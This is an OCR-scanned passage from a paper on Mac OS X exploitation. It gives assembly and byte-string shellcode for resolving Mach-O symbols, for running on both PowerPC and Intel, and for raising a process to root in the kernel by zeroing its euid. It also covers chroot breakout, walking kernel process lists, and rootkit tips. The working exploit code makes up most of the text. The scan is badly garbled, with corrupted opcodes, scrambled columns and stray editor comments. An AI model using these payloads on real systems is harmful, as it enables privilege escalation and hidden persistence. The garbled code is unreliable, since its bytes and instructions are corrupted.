xor eCcxX, €CX 
mov word cx,0xl0lc 


For symbol resolution, we are only interested in LC_SEGMENT 
commands and the LC_SYMTAB. In particular we are looking for 
the LINKEDIT LC_SEGMENT struct. This is explained in more 
detail later. 


The #define’s for these are in /usr/include/mach-o/loader.h 
as follows: 


define LC_SEGMENT Oxl 
/* segment of this file to be mapped */ 
define LC_SYMTAB 0x2 


/* link-edit stab symbol table info */ 
The LC_SYMTAB command uses the following struct: 


struct symtab_command 

{ 
uint_32 cmd; 
uint_32 cmdsize; 
uint_32 symoff; 
uint_32 nsyms; 
uint_32 stroff; 
uint_32 strsize; 


}; 


The symoff field holds the offset from the start of the file to 
the symbol table. The stroff field holds the offset to the string 
t 

t 


able. Both the symbol table and string table are contained in 
he LINKEDIT section. 


By subtracting the symoff from the stroff we get the offset into 
the LINKEDIT section in which to read our strings. The nsyms 
field can be used as a loop count when enumerating the symtab. 

F 

t 


or the sake of this sample code, however,i have assumed that 
he symbol exists and ignored the nsyms field entirely. 


We find the LC_SYMTAB command simply by looping through and 
checking the "cmd" field for 0x2. 


The LINKEDIT section is slightly harder to find; we need to look 
for a load command with the cmd type Oxl (segment_command), 
1e 
t 


hen check for the name "__LINKEDIT" in the segname field of 
he struct. The segment_command struct is shown below: 


struct segment_command 
{ 

nt32_t cmd; 
nt32_t cmdsize; 
har segname[16]; 
nt32_t vmaddr; 
nt32_t vmsize; 
nt32_t fileoff; 
nt32_t filesize; 
m_prot_t maxprot; 
m_prot_t initprot; 
nt32_t nsects; 
nt32_t flags; 


Qqeca 


Ge GG 


g< 


1 
1 
1 
1 
1 
1 
1 
1 


CeuG 


}; 


I will now run through an explanation of the assembly code 
used to accomplish this technique. 
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I have used a trivial state machine to loop through each 
load_command until both the symbol table and LINKEDIT virtual 
addresses have been found. 


First we check which type of load_command each is and then we 
jump to the appropriate handler, if it is one of the types we 
need. 


next_header: 


cmp byte [ecx],0x2 ;# test for LC_SYMTAB (0x2) 
je found_lcsymtab 
cmp byte [ecx],0xl ;# test for LC_SEGMENT (0x1) 
je found_lcsegment 


The next two instructions add the length field of the 
load_command to our pointer. This positions us over the cmd 
field of the next load_command in memory. We jump back up 
to the next_header symbol and compare again. 


next: 
add ecx, [ecx + 0x4] ;# ecx += length 
jmp next_header 
The found_lcsymtab handler is called when we have a cmd == 0x2. 


We make the assumption that there’s only one LC_SYMTAB. We can 
use the fact that if we’re here, eax hasn’t been set yet and is 0. 
By comparing this with edx we can see if the LINKEDIT segment has 
been found. After the cmp, we update eax with the address of the 
LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been 
found, we jmp to the "found_both" symbol, otherwise we process 
the next header. 


found_lcsymtab: 


cmp eax, edx ;# use the fact that eax is 0 to test edx. 
mov eax, ecx ;# update eax with current pointer. 

jne found_both ;# we have found LINKEDIT and LC_SYMTAB 
jmp next ;# keep looking for LINKEDIT 


The found_lcsegment handler is very similar to the 
found_lcsymtab code. However, since there are many LC_SEGMENT 
commands in most files we need to be sure that we’ve found 
the __ LINKEDIT section. 


To do this we add 8 to the struct pointer to get to the 
segname[] string. We then check 2 characters in, skipping 
the "__" for the 4 bytes "LINK". 0x4b4e494c accounting for 
endian issues. Again, we use the fact that there should 
only be one LINKEDIT section. This means that if we are 
past the check for "LINK" edx is 0. We use this to test 
eax, to see if the LC_SYMTAB command has been found. 

Again if we are done we jmp to found_both, if not back 

up to the "next_header" symbol. 


found_lcsegment: 


lea esi, [ecx + 0x8] ;# get pointer to name 
;# test for "LINK" 
cmp long [esi + 0x2],0x4b4e494c 
jne next ; it’s not LINKEDIT, NEXT! 
cmp edx, eax : use zero’ed edx to test eax 
mov edx, €cx : set edx to current address 
jne found_both ;# we’re done! 
jmp next ;7# still need to find 

; LC_SYMTAB, continue 

7 EDX = LINKEDIT struct 

. BAX = LC_SYMTAB struct 
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Now that we have our pointers to LINK 


5 2017 11 


EDIT and LC_SYMTAB, we 


subtract symtab_command.symoff from symtab_command.stroff to 


obtain the offset of the stri 
By adding this offset to LINK 


found_both: 
mov edi, [eax + 0x10 
sub edi, [eax + 0x8] 
mov esi, [edx + 0x18 
add edi,esi : 
The LINKEDIT section contains a 


into the string table (which we 


Each one corresponds to a symbol. 


ngs table from the start of LINK 
EDIT’s virtual address, 
calculated the virtual address of the stri 


we have 


"struct nlist" 
The first union contains a 
have the VA for). In order t 


list of 


TY 
add virtual address of LINK 


can 


EDIT. 
now 


ng table in memory. 


; EDI = stroff 
;# EDI -= symoff 
esi = VA of linkedit 


EDIT to offset 


structures. 


n offset 
o find the 


symbol we want we simply cycle through the array and offset our 
string table pointer to test the string. 


struct nlist 
{ 
union { 
ifndef __LP64__ 
char *n_name; 
endif 
int32_t n_strx; 
} nun; 
uint8_t n_type; 
uint8_t n_sect; 
intl6_t n_desc; 
uint32_t n_value; 


}; 
] 


Now that we are able to walk through our 
However it wouldn’t make sense to store the full symbol 
larger than it 


to go. 


name in our shellcode as this would mak 


A 


already is. 


I have chosen to steal*H*H*H*Huse skape’s 


from "Understanding Windows Shel 
code works in his paper. 


The following code shows a simp] 
"hashes" symbol, 
hashes. We read th 
the nlist structures, 
against our precomputed hash. 


first hash in, 


the cod 


"compute_hash" 


llcode" [5]. 


le loop. 


nlist structs we are good 


function 
He explains how the 


First we jump down to the 
and call back up to get a pointer to our list of 
and then loop through each of 
hashing the symbol found and comparing it 


If the hash is unsuccessful we jump back up to "check_next_hash", 


however if it’s successful we continue down to the 


"done" 


;# esi == constant pointer to nlist 
;# edi == strtab base 
lookup_symbol: 
jmp hashes 
lookup_symbol_up: 
pop ecx 
mov ecx, [ecx] ;# ecx = first hash 
check_next_hash: 
push esi ;# save nlist pointer 
push edi ;# save VA of strtable 
mov esi, [esi] ;# *esi = 
add esi,edi ;# add VA of strtab 
compute_hash: 
xor edi, edi 
xOr eax, eax 


symbol. 


offset from strtab to string 


11.txt Wed Apr 26 09:43:45 2017 12 


cld 
compute_hash_again: 
lodsb 
test al, al ;# test if on the last byte. 
jz compute_hash_finished 
ror edi, Oxd 
add edi, eax 
jmp compute_hash_again 
compute_hash_finished: 


cmp edi,ecx 

pop edi 

pop esi 

je done 

lea esi, [esi + Oxc] ;# Add sizeof(struct nlist) 
jmp check_next_hash 


done: 


Each hash we wish to resolve can be appended after the hashes: symbol. 


;# hash in edi 


hashes: 
call lookup_symbol_up 
dd Ox8bd2d84d 


Now that we have the address of our symbol we’re all done and can 
call our function, or modify it as we need. 


In order to calculate the hash for our required symbol, I have cut 
and paste some of skapes code into a little c progam as follows: 


include <stdio.h> 
include <stdlib.h> 


char chsc[] = 

"\x89\xe5\x51\x60\x8b\x75\x04\x31" 
"\ xff£\x31\xc0\xfc\xac\x84\xc0\x74" 
"\x07\xcl\xcf£\x0d\x01\xc7\xeb\xf4" 
"\x89\x7d\xfc\x61\x58\x89\xec\xc3"; 


int main(int ac, char **av) 
{ 
long (*hashstr) () = (long (*) ())chsc; 


LF (ac sD) 4 
fprintf(stderr,"[!] usage: %s <string to hash>\n", *av); 
exit(1); 


} 
printf("{+] Hash: Ox%x\n",hashstr(av[1])); 


return 0; 


} 
We can run this as shown below to generate our hash: 


—[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload 
[+] Hash: 0x8bd2d84d 


If the symbol we have resolved is a function that we wish to call 
there is a little more we must do before this is possible. 


Mac OS X’s linker, by default, uses lazy binding for external 
symbols. This means that if our intended function calls another 
function in an external library, which hasn’t been called elsewhere 
in the program already, the dynamic linker will try to resolve 

the address as you call it. 


For example, a call to execve() with lazy binding will be replaced 
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with a call to dyld_stub_execve() as shown below: 
Ox1lf54 <do_payload+78>: call Ox301b <dyld_stub_execve> 


At runtime this function contains one instruction: 


call Ox8fel2£70 <__dyld_fast_stub_binding_helper_interface> 


This invokes the dyld which resolves the symbol and replaces this 
instruction with a jmp to the real code: 


jmp O0x9003b7d0 <execve> 
The only problem which this causes is that this function requires 


the stack pointer to be correctly aligned, otherwise our code will 
crash. 


To do this we simply subtract Oxc from our stack pointer before 
calling our function. 


Note: 
This will not be necessary if the program you are 
exploiting has been compiled with the -bind_at_load 
flag. 


Here is the code I have used to make the call. 


done: 
mov eax, [esi + 0x8] ;# eax == value 
xchg esp, edx ;# annoyingly large 
sub dl,0Oxc ;# way to align the stack pointer 
xchg esp, edx 7# without null bytes. 
call eax 
xchg esp, edx ;# annoyingly large 
add dl,O0xc ;# way to fix up the stack pointer 
xchg esp, edx ;# without null bytes. 
ret 


I have written a small sample c program to demonstrate this code 
in action. 


The following code has no call to do_payload(). The shellcode will 
resolve the address of this function and call it. 


include <stdio.h> 
include <stdlib.h> 


char symresolve[] = 
"\x31\xdb\xf£7\xe3\x31\xc9\x66\xb9\x1lc\x10\x80\x39\x02\x74\x0a\x80" 
"\x39\x01\x74\x0d\x03\x49\x04\xeb\xf1\x39\xd0\x89\xc8\x75\x16\xeb" 
"\xf3\x8d\x71\x08\x81\x7e\x02\x4c\x49\x4e\x4b\x75\xe7\x39\xc2\x89" 
"\xca\x75\x02\xeb\xd£\x8b\x78\x10\x2b\x78\x08\x8b\x72\x18\x01\xf£7" 
"\xeb\x39\x59\x8b\x09\x56\x57\x8b\x36\x01\xfe\x31\xf£\x31\xc0\xfc" 
"\xac\x84\xc0\x74\x07\xcl\xcf£\x0d\x01\xc7\xeb\xf£4\x39\xcf£\x5£\x5e" 
"\x74\x05\x8d\x76\x0c\xeb\xde\x8b\x46\x08\x87\xe2\x80\xea\x0c\x87" 
"\xe2\xf£\xd0\x87\xe2\x80\xc2\x0c\x87\xe2\xc3\xe8\xc2\xff£f\xff\xffi" 
"\x4d\xd8\xd2\x8b"; // HASH 


void do_payload() 
{ 


char *args[] = {"/usr/bin/id",NULL}; 
char *env[] = {"TERM=xterm",NULL}; 
printf("[+] Executing id.\n"); 


execve (*args,args,env) ; 


} 


int main(int ac, char **av) 


{ 
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void (*fp) () = (void (*) ())symresolve; 
fp); 
return 0; 


As you can see below this code works as you’d expect. 


—[nemo@fry:~]$ ./testsymbols 
[+] Executing id. 
uid=501 (nemo) gid=501(nemo) groups=501 (nemo) 


The full assembly listing for the method shown in this section 
is shown in the Appendix for this paper. 


I originally worked on this method for resolving kernel symbols. 
Unfortunately, the kernel jettisons (free()’s) the LINKEDIT section 


after it boots. Before doing this, it writes out the mach-o fil 
/mach.sym containing the symbol information for the kernel. 


If you set the boot flag "keepsyms" the LINKEDIT section will 
not be free()’ed and the symbols will remain in kernel memory. 


In this case we can use the code shown in this section, and 
simply scan memory starting from the address 0x1000 until we 
find Oxfeedface. Here is some assembly code to do this: 


SECTION .text 


_main: 
xor eax, eax 
inc eax 
shl eax, O0xc ;# eax = 0x1000 
mov ebx, Oxfeedfac : bx Oxfeedfac 
up: 
inc eax 
inc eax 
inc eax 
inc eax ;# eax += 4 
cmp ebx, [eax] ;# if (*eax != ebx) { 
jnz up ;# goto up } 
ret 


After this is done we can resolve kernel symbols as needed. 
--[ 4 - Architecture Spanning Shellcode 


Since the move from PowerPC to Intel architecture it has become 
common to find both PowerPC and Intel Macs running Mac OS X in 

the wild. On top of this, Mac OS X 10.4 ships with virtualization 
technology from Transitive called Rosetta which allows an Intel Mac 
toexecute a PowerPC binary. This means that even after you’ve 
finger-printed the architecture of a machine as Intel, there’s a 
chance a network facing daemon might be running PowerPC code. This 
poses a challenge when writing remote exploits as it is harder 
incorrectly fingerprinting the architecture of the machine will 
result in failure. 


In order to remedy this a technique can be used to create 
shellcode which executes on both Intel and PowerPC architecture. 


This technique has been documented in the Phrack article of the same 
name as this section [16]. 
I provide a brief explanation here as this technique is used 
throughout the remainder of the paper. 


The basic premise of this technique is to find a PowerPC instruction 
which, when executed, will simply step forward one instruction. It 
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must do this without performing any memory access, only changing the 

state of the registers. When this instruction is interpreted as Intel 
opcodes however, a jump must be performed. This jump must be over the 
PowerPC portion of the code and into the Intel instructions. In this 

way the architecture type can be determined. 


A suitable PowerPC instruction exists. This is the "rlwnm" 
instruction. 


The following is the definition of this instruction, taken from the 
PowerPC manual: 


(rlwnm) Rotate Left Word then AND with Mask (x’5c00 0000’) 


rlwnm rA,xrS,rB,MB, ME (Re = 0) 

riwnm. rA,rS,rB,MB, ME (Rc = 1) 

v . 
{}10101 | iS) | A | B | MB | ME |Re | 
PPE PELE Pe PP Ee OEE BORE EE BLP BAP EE Ee PEE BOP EE EB EE PEEP ECE ET PPE EOP SF EPP SD EE 
0 5 6 10 11 15 16 20 21 25.26 30 31 


This is the rotate left instruction on PowerPC. Basically a mask, 
(defined by the bits MB to ME) is applied and the register rS is 
rotated rB bits. The result is stored in rA. No memory access is 
made by this instruction regardless of the arguments given. 


By using the following parameters for this instruction we can 
end up with a valid and useful opcode. 


rA = 16 
rS = 28 
rB = 29 
MB = XX 
ME = XX 


rlwnm r16,r28,r29, XX, XX 
This leaves us with the opcode: 
"\x5£\x90\xeb\xxx" 


When this is broken down as Intel code it becomes the following 
instructions: 


nasm > db Ox5f,0x90,O0xeb, 0xXX 


00000000 5F pop edi // move edi to the stack 
00000001 90 nop // do nothing. 
00000002 EBXX jmp short OxXX // jump to our payload. 


Here is a small example of how this can be useful. 


char trap[] = 


"\x5f£\x90\xeb\x06" // magic arch selector 
"\x7£\xe0\x00\x08" // trap pepe instruction 
"\xcec\xcc\xcc\xcc"; // intel: int3 int3 int3 int3 


This shellcode when executed on PowerPC architecture will 

execute the "trap" instruction directly below our selector code. 
However when this is interpreted as Intel architecture instructions 
the "eb 06" causes a short jump to the int3 instructions. The 

reason 06 rather than 04 is used for our jmp short value here is that 
eip is pointing to the start of the jmp instruction itself (eb) 
during execution. Therefore, the jmp instruction needs to compensate 
by adding two bytes to the lenth of the PowerPC assembly. 


To verify that this multi-arch technique works, here is the output 
of gdb when attached to this process on Intel architecture: 
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Program received signal SIGTRAP, Trace/breakpoint trap. 
0x0000201b in trap () 

(gdb) x/i Spc 

Ox201b <trap+11>: int3 


Here is the same output from a PowerPC version of this binary: 
Program received signal SIGTRAP, Trace/breakpoint trap. 
0x00002018 in trap () 

(gdb) x/i Spc 
Ox2018 <trap+4>: trap 


--[ 5 - Writing Kernel level shellcod 


In this section we will look at some techniques for writing shellcode 
for use when exploiting kernel level vulnerabilities. 


A couple of things to note before we begin. Mac OS X does not share an 
address space for kernel/user space. Both the kernel and userspace 
have a 4gb address space each (0x0 —-> Oxffffffff). 


I did not bother with writing PowerPC code again for most of what I’ve 
done, if you really want PowerPC code some concepts here will quickly 
port others require a little thought ;). 


--[ 5.1 - Local privilege escalation 


The first type of kernel shellcode we will look at writing is for 
local vulnerabilities. The typical objective for local kernel 
shellcode is simply to escalate the privileges of our userspace 
process. 


This topic was covered in noir’s excellent paper on OpenBSD kernel 
exploitation in Phrack 60. [6] 


A lot of the techniques from noir’s paper apply directly to Mac OS X. 
noir shows that the sysctl() function can be used to retrieve the 
kinfo_proc struct for a particular process id. As you can see below 
one of the members of the kinfo_proc struct is a pointer to the proc 
struct. 


struct kinfo_proc { 


struct extern_proc kp_proc; /* proc structure */ 
struct eproc { 

struct proc *e_paddr; /* address of proc */ 
struct session *e_sess; /* session pointer */ 
struct _pcred e_pcred; /* process credentials */ 
struct _ucred e_ucred; /* current credentials */ 
struct vmspace e€_vm; /* address space */ 
pid_t e_ppid; /* parent process id */ 
pid_t e_pgid; /* process group id */ 
short e_jobc; /* job control counter */ 
dev_t e_tdev; /* controlling tty dev */ 
pid_t e_tpgid; /* tty process group id */ 
struct session *e_tsess; /* tty session pointer */ 

#define WMESGLEN 7 
char e_wmesg [WMESGLEN+1]; /* wchan message */ 
segsz_t e_xsize; /* text size */ 
short e_xrssize; /* text rss */ 
short e_xccount; /* text references */ 
short e_XSWIrss; 
int32_t e_flag; 

define EPROC_CTTY 0x01 /* controlling tty vnode active */ 

define EPROC_SLEADER 0x02 /* session leader */ 

define COMAPT_MAXLOGNAME 12 


char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/ 
int32_t e_spare[4]; 
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Ilja van Sprundel mentioned this technique in his talk at Blackhat [7]. 


Basically, we can use the 


leaked address 


"o.kp_eproc.ep_addr" to access 


the proc struct for our process in memory. 


The following function will 
in the kernel. 


long get_addr(pid_t pid) { 


return the address of a pid’s proc struct 


int i, sz = sizeof(struct kinfo_proc), mib[4]; 


struct kinfo_proc p; 


mib[0] = CTL_KERN; 

mib[1] = KERN_PROC; 

mib[2] = KERN_PROC_PID; 

mib[3] = pid; 

1 = sysctl(&mib, 4, &p, &82Z, 

if (i == -1) { 
perror("sysctl()"); 
exit (0); 


} 
return(p.kp_eproc.e_paddr) ; 


} 


Now that we have the address of our 


0); 


proc struct, we simply have to 


structures. 


change our uid and/or euid in their 


Here is a snippet from the proc struct: 


struct proc { 


LIST_ENTRY (proc) p_list; 


/* substructures: */ 


struct ucred *p_ucred; 
struct filedesc *p_fd; 
struct 

struct plimit *p_limit; 
struct sigacts *p_sigacts; 


respectiv 


pstats *p_stats; /* Accounting/statistics 


/* List of all processes. */ 


/* Process owner’s identity. */ 
/* Ptr to open files structure. 
(PROC ONLY). 
/* Process limits. */ 


/* Signal actions, state (PROC ONLY). */ 


As you can see, following the p_list there is a pointer to the 
ucred struct. This struct is shown below. 


struct _ucred { 
int32_t cr_ref; 


uid_t cr_uid; 
short cr_ngroups; 
gid_t cr_groups [NGROUPS]; 


}; 


/* veference count */ 
/* effective user id */ 
/* number of groups */ 
/* groups */ 


By changing the cr_uid field in this struct, we set the euid of 


our process. 


The following assembly code will seek to this struct and null 


out the ucred cr_uid field. 
privileges on an Intel platform. 


SECTION .text 


_main: 
mov ebx, [Oxdeadbeef] 
mov ecx, [ebx + 8] 
xor eax, eax 
mov [ecx + 12], eax 


ret 


This leaves us with root 


;# ebx = proc address 
;# ecx = ucred 


;# zero out the euid 


*/ 
af 
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To use this code we need to replace the address Oxdeadbeef with 
the address of the proc struct which we looked up earlier. 


Here is some code from Ilja van Sprundel’s talk which does the 
same thing on a PowerPC platform. 


int kshellcode[] = { 
Ox3ca0aabb, // lis r5, Oxaabb 
Ox60a5ccdd, // ori r5, r5, Oxccdd 
Ox80c5f£f£a8, // lwz r6, A-88(r5) 
0x80e60048, // lwz r7, 72(r6) 
0x39000000, // li r8, 0 
0x9106004c, // stw r8, 76(r6 
0x91060050, // stw r8, 80(r6 
0x91060054, // stw r8, 84(r6 
(r6 
ys) 


0x91060058, // stw r8, 88 
0x91070004 // stw r8, 4( 
} 


We can combine the two shellcodes into one architecture 
spanning shellcode. This is a simple process and is 
documented in section 4 of this paper. 


The full listing for our multi-arch code is shown 
in the Appendix. 


On PowerPC processors XNU uses an optimization referred to 
as the "user memory window". This means that the user address 
space and the kernel address space share some mappings. 


[This design is in place for copyin/copyout etc to use. 

The user memory window typically starts at 0xe0000000 in both 
the kernel and user address space. This can be useful when 
trying to position shellcode for use in local privilege 
escalation vulnerabilities. 


--[ 5.2 - Breaking chroot () 


Before we look into how we can go about breaking out of 
processes after they have used the chroot() syscall, we 
will a look at why, a lot of the time, we don’t need to. 


—[root@fry:/chroot]# touch file_outside_chroot 
—[root@fry:/chroot]# ls -lsa file_outside_chroot 
QO -rw-r--r-- 1 root admin 0O Jan 29 12:17 file_outside_chroot 


—[root@fry:/chroot]# chroot demo /bin/sh 


-[root@fry:/ ls -lsa file_outside_chroot 

ls: file _outside_chroot: No such file or directory 

—[root@fry:/ pwd 

is 

-[root@fry:/ ls -lsa ../file_outside_chroot 

0 -rw-r--r-- 1 root admin 0O Jan 29 20:17 ../file_outside_chroot 
-[root@fry:/ ../../usr/sbin/chroot ../../ /bin/sh 

-[root@fry:/ ls -lsa /chroot/file_outside_chroot 

0 -rw-r--r-- 1 root admin 0O Jan 29 12:17 /chroot/file_outside_chroot 


As you can see, the /usr/sbin/chroot command which ships 
with Mac OS X does not chdir() and therefore does not 
really do very much at all. 


The author suggests the following addition be made to the 
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chroot man page on Mac OS X: 
"Caution: Does not work." 


On an unrelated note, this patch would also be suitable for 
the setreuid() man page. 


I won’t spend too much time on this since noir already 
covered it really well in his paper. [6] 


Basically as noir mentions, all we need to do to break our 
process out of the chroot() is to set the p->p_fd->fd_rdir 
element in our proc struct to NULL. 


We can get the address of our proc struct using sysctl as 
mentioned earlier. 


noir already provides us with the instructions for this: 


mov edx, [ecx + 0x14] ;# edx = p->p_fd 
mov [edx + Oxc],eax ;# p->p_fd->fd_rdir = 0 
--[ 5.3 - Advancements 


Now that we are familiar with writing shellcode for use 

in local exploits, where we already have local access to 
the box, the rest of the kernel related code in this paper 
will focus on accomplishing it’s task without any userspace 
access required. 


In order to do this, we can utilize the per cpu/task/proc/ 
and thread structures in the kernel. The definitions for 
each of these structures can be found in the osfmk/kern 
and bsd/sys/ directories in various header files. 


The first struct which we will look at is the "cpu_data" 
struct found in osfmk/i386/cpu_data.h. 


I have included the definition for this struct below: 


/* 
* Per-cpu data. 
* 
* Each processor has a per-cpu data area which is dereferenced through the 
* using this, in-lines provides single-instruction access to frequently 
* used members - such as get_cpu_number()/cpu_number(), and 
* get_active_thread()/ current_thread(). 
* 
* Cpu data owned by another processor can be accessed using the 
* cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of 
* per-cpu pointers. 
af 
typedef struct cpu_data 
{ 
struct cpu_data *cpu_this; /* pointer to myself */ 
thread_t cpu_active_thread; 
void *cpu_int_state; /* interrupt state */ 
vm_offset_t cpu_active_stack; /* kernel stack base */ 
vm_offset_t cpu_kernel_stack; /* kernel stack top */ 
vm_offset_t cpu_int_stack_top; 
int cpu_preemption_level; 
int cpu_simple_lock_count; 
int cpu_interrupt_level; 
int cpu_number; /* Logical CPU */ 
int cpu_phys_number; /* Physical CPU */ 
cpu_id_t cpu_id; /* Platform Expert */ 
int cpu_signals; /* IPI events */ 
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int cpu_mcount_off; /* mcount recursion */ 
ast_t cpu_pending_ast; 

int cpu_type; 

int cpu_subtype; 

int cpu_threadtype; 

int cpu_running; 

uint64_t rtclock_intr_deadline; 
rtclock_timer_t rtclock_timer; 
boolean_t cpu_is64bit; 
task_map_t cpu_task_map; 

addr64_t cpu_task_cr3; 

addr64_t cpu_active_cr3; 
addr64_t cpu_kernel_cr3; 
cpu_uber_t cpu_uber; 

void *cpu_chud; 

void *cpu_console_buf; 
struct cpu_core *cpu_core; /* cpu’s parent core */ 
struct processor *cpu_processor; 

struct cpu_pmap *cpu_pmap; 

struct cpu_desc_table *cpu_desc_tablep; 
struct fake_descriptor *cpu_ldtp; 
cpu_desc_index_t cpu_desc_index; 

int cpu_ldt; 


#ifdef MACH KDB 
/* XXX Untested: */ 


int cpu_db_pass_thru; 
vm_offset_t cpu_db_stacks; 
void *cpu_kdb_saved_state; 
splot cpu_kdb_saved_ipl; 
int cpu_kdb_is_slave; 
int cpu_kdb_active; 
#endif /* MACH_KDB */ 
boolean_t cpu_iflag; 
boolean_t cpu_boot_complete; 
int cpu_hibernate; 
pmsd pms; /* Power Management Stepper control */ 
uint64_t rtcPop; /* when the etimer wants a timer pop */ 
vm_offset_t cpu_copywindow_bas; 
uint64_t *cpu_copywindow_pdp; 
vm_offset_t cpu_physwindow_base; 
uint64_t *cpu_physwindow_ptep; 
void *cpu_hi_iss; 
boolean_t cpu_tlb_invalid; 
uint64_t *cpu_pmHpet; 
/* Address of the HPET for this processor */ 
uint32_t cpu_pmHpetVec; 
/* Interrupt vector for HPET for this processor */ 
fe Statistics */ 
pmStats_t cpu_pmStats; 
/* Power management data */ 
uint32_t cpu_hwintCnt [256]; /* Interrupt counts */ 
uint64_ t cpu_dr7; /* debug control register */ 


} cpu_data_t; 


As you can see, this structure contains valuable information 
for our shellcode running in the kernel. We just need to 
figure out how to access it. 


The following macro shows how we can access this structure. 


/* Macro to generate inline bodies to retrieve per-cpu data fields. */ 

define offsetof (TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER) 

define CPU_DATA_GET (member, type) \ 
type ret; \ 
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asm__ volatile ("movl %%gs:%P1,%0" 

"=r" (ret) 

"i" (offsetof (cpu_data_t,member)))j; 
return ret; 


ee a ade 


When our code is executing in kernel space the gs selector can be used 
to access our cpu_data struct. The first element of this struct 
contains a pointer to the struct itself, so we no longer need to 

use gs after this. 


The first objective we will look at is the ability to find the 
init process (pid=1) via this struct. Since our code may not 

be running with an associated user space thread, we cannot count 
on the uthread struct being populated in our thread_t struct. 

An example of this might be when we exploit a network stack or 
kernel extension. 


The first step we must make to find the init process struct 
is to retrieve the pointer to our thread_t struct. 


We can do this by simply retrieving the pointer at gs:0x04. 
The following instructions will achieve this: 


_main: 
xor ebx, ebx ;# zero ebx 
mov eax, [gs:0x04 + ebx] ;# thread_t. 


After these instructions ar xecuted, we have a pointer to 
our thread struct in eax. The thread struct is defined in 
osfmk/kern/thread.h. A portion of this struct is shown below: 


struct thread { 
queue_chain_t links; /* rvrun/wait queue links */ 


1 
run_queue_t rung; /* run queue thread is on SEE BELOW */ 
wait_queue_t wait_queue; /* wait queue we are currently on */ 
Fg 
t 


event64_t wait_event; /* wait queue event */ 
integer_t options;/* options set by thread itself */ 


/* Data used during setrun/dispatch */ 


timer_data_t system_timer; /* system mode timer */ 
processor_set_t processor_set;/* assigned processor set */ 
processor_t bound_processor; /* bound to a processor? */ 
processor_t last_processor; /* processor last dispatched on */ 
uint64_t last_switch; /* time of last context switch */ 
void *uthread; 


endif 
}; 


This struct, again, contains many fields which are useful 
for our shellcode. However, in this case we are trying to 
find the proc struct. Because we might not necessarily 
already have a uthread associated with us, as mentioned 
earlier, we must look elsewhere for a list of tasks to 


locate init (launchd). 


The next step in this process is to retrieve the 
"last_processor" element from our thread_t struct. 
We do this using the following instructions: 


mov b1,0xf4 

mov ecx, [eax + ebx] ;# last_processor 
The last_processor pointer points to a processor 
struct as the name suggests ;) We can walk from the 
last_processor struct back to the default pset in 
order to find the pset which contains init. 
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mov eax, [ecx] 
We then retrieve the task head from this struct. 
push word 0x458 
pop bx 
mov eax, [eax + ebx] 


And retrieve 
This is a pro 


the bsd_info element of the task. 
c struct pointer. 


;# tasks head. 


;# default_pset + Oxc 


push word 0x19c 
pop bx 
mov eax, [eax + ebx] 


The first element of the proc struct is: 


LIST_ENTRY (proc) p_list; /* List 


We can walk t 
For most 
process ( 


launchd on Mac OS X). This process has 


To find this we simply walk the list checking the 


at offset 36. The code to do this is as follows: 


next_proc: 


mov eax, [eaxt4] 
mov ebx, [eax + 36] 
dec ebx 
test ebx, ebx 
jnz next_proc 
done: 
i# eax = struct proc *init; 


Now that we have developed code which will 


his list o find a particular process 
of our code we will start with a pointer 


to the proc struct for the init process, we can 


;# get bsd_info 


[The proc struct is defined in xnu/bsd/sys/proc_internal.h. 


of all processes. */ 
that we want. 

to the init 

a pid of 1. 


pid field 


;# prev 
;# pid 


;# if pid was 1 


retrieve a pointer 


look at some 


of the things that we can accomplish using this pointer. 


The first thing which we will look at is simply rewriting the 


privilege escalation code listed earlier. 


this code will 


Our new version of 
not require any help from userspace 


(sysctl etc). 


I think the below code is fairly self explanatory. 


Sdefine PID 1337 


find_pid: 
mov eax, [eax + 4] ;# eax = next proc 
mov ebx, [eax + 36] ;# pid 
cmp bx, PID 
jnz find_pid 
mov ecx, [eax + 8] ;# ecx = ucred 
xor eax, eax 
mov [ecx + 12], eax : zero out the euid 


As you can see the cpu_data struct opens up many possibilities 


for our shellcod 
of these in a future paper. 


--[ 6 - Misc Rootkit Techniques 


In this section I will 


for Mac OS X. 
this stuff, 


developing a rootkit 
another place to put 


run over a few short pieces 
information which might be relevant to someone who 
I didn’t really 
so this will have 


Hopefully I will have time to go into some 


of 

is 
have 
to do. 
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The first thing to note is that an API exists [21] for 
executing userspace applications from kernelspace. This 
is called the Kernel User Notification Daemon. This is 
implemented using a mach port which the kernel uses to 
communicate with a userspace daemon named kuncd. 


The file xnu/osfmk/UserNotification/UNDRequest.defs 
contains the Mach Interface Generator (MIG) interface 
definitions for the communication with this daemon. 


The mach port is called: 
"com.apple.system.Kernel[UNC]Notifications" and is 
registered by the daemon /usr/libexec/kuncd. 


Here is an example of how to use this interface 
programmatically. The interface allows you to display 
messages via the GUI to the user, and also run any 
application. 


kern_return_t ret; 
ret = KUNCExecute ( 
"/Applications/TextEdit.app/Contents/MacOS/TextEdit", 
kOpenAppAsRoot, 
kOpenApplicationPath 


i 

ret = KUNCExecute ( 
"Internet.prefPane", 
kOpenAppAsConsoleUser, 
kOpenPreferencePanel 


i 


There may be a situation where you wish code to b xecuted on all the 
processors on a system. This may be something like updating the IDT / MSR 
and not wanting a processor to miss out on it. 


The xnu kernel provides a function for this. The comment and prototype 
explain this a lot better than I can. So here you go: 


/* 
* Al1-CPU rendezvous: 

* -— CPUs are signalled, 

* all execute the setup function (if specified), 

ns —- rendezvous (i.e. all cpus reach a barrier), 

bd all xecute the action function (if specified), 

% — rendezvous again, 

x xecute the teardown function (if specified), and then 

e —- resume. 

* 

* Note that the supplied external functions _must_ be reentrant and aware 
* that they are running in parallel and in an unknown lock context. 

* 


void 

mp_rendezvous (void (*setup_func) (void *), 
void (*action_func) (void *), 
void (*teardown_func) (void *), 
void *arg) 


{ 


The code for the functions related to this are stored in 
xnu/osfmk/i386/mp.c. 


fit y: Universal Binary Infection 


TO SOMEWHERE EARLIER IN THE PAPER? YOU CAN EXPAND A LITTLE AND 
IT MIGHT MAKE THE LINKEDIT / LC_SYMTAB ETC SECTION MORE CLEAR AS 


[SINCE YOU CHAT A BIT ABOUT MACH-O HERE, MAYBE MOVE THIS SECTION 
K 
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YOU ALSO GO INTO THE MAGIC NUMER MUMBO-JUMBO HERE AS WELL] 

The Mach-O object format is used on operating systems which have 
a kernel based on Mach. This is the format which is used by 

Mac OS X. Significant work has already been done regarding the 
infection of this format. The papers [12] and [13] show some of 
